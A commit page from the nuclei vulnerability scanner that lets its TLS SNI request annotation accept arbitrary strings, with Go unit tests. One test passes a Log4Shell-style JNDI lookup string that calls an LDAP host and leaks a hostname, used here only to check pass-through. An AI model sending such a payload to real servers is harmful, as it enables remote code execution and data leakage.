http: support arbitrary strings on TLS SNI annotation (projectdiscove…

…ry#4462)
Marcuccio · Dec 20, 2023 · 1fadc83 · 1fadc83
1 parent d223c90
commit 1fadc83
Show file tree

Hide file tree

Showing 2 changed files with 39 additions and 3 deletions.
diff --git a/pkg/protocols/http/request_annotations.go b/pkg/protocols/http/request_annotations.go
@@ -2,6 +2,7 @@ package http
 
 import (
 	"context"
+	"crypto/tls"
 	"net"
 	"regexp"
 	"strings"
@@ -87,10 +88,8 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
 	if hosts := reSniAnnotation.FindStringSubmatch(rawRequest); len(hosts) > 0 {
 		value := strings.TrimSpace(hosts[1])
 		value = stringsutil.TrimPrefixAny(value, "http://", "https://")
-		if idxForwardSlash := strings.Index(value, "/"); idxForwardSlash >= 0 {
-			value = value[:idxForwardSlash]
-		}
 
+		var literal bool
 		switch value {
 		case "request.host":
 			value = request.Host
@@ -99,9 +98,15 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
 				value = interactshURL
 			}
 			overrides.interactshURLs = append(overrides.interactshURLs, value)
+		default:
+			literal = true
 		}
 		ctx := context.WithValue(request.Context(), fastdialer.SniName, value)
 		request = request.Clone(ctx)
+
+		if literal {
+			request.TLS = &tls.ConnectionState{ServerName: value}
+		}
 		modified = true
 	}
 

diff --git a/pkg/protocols/http/request_annotations_test.go b/pkg/protocols/http/request_annotations_test.go
@@ -10,6 +10,37 @@ import (
 	"github.com/stretchr/testify/require"
 )
 
+func TestRequestParseAnnotationsSNI(t *testing.T) {
+	t.Run("compliant-SNI-value", func(t *testing.T) {
+		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
+		rawRequest := `@tls-sni: github.com
+		GET / HTTP/1.1
+		Host: {{Hostname}}`
+
+		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
+		require.Nil(t, err, "could not create http request")
+
+		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
+		require.True(t, modified, "could not apply request annotations")
+		require.Equal(t, "github.com", overrides.request.TLS.ServerName)
+		require.Equal(t, "example.com", overrides.request.URL.Hostname())
+	})
+	t.Run("non-compliant-SNI-value", func(t *testing.T) {
+		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
+		rawRequest := `@tls-sni: ${jndi:ldap://${hostName}.test.com}
+		GET / HTTP/1.1
+		Host: {{Hostname}}`
+
+		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
+		require.Nil(t, err, "could not create http request")
+
+		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
+		require.True(t, modified, "could not apply request annotations")
+		require.Equal(t, "${jndi:ldap://${hostName}.test.com}", overrides.request.TLS.ServerName)
+		require.Equal(t, "example.com", overrides.request.URL.Hostname())
+	})
+}
+
 func TestRequestParseAnnotationsTimeout(t *testing.T) {
 	t.Run("positive", func(t *testing.T) {
 		request := &Request{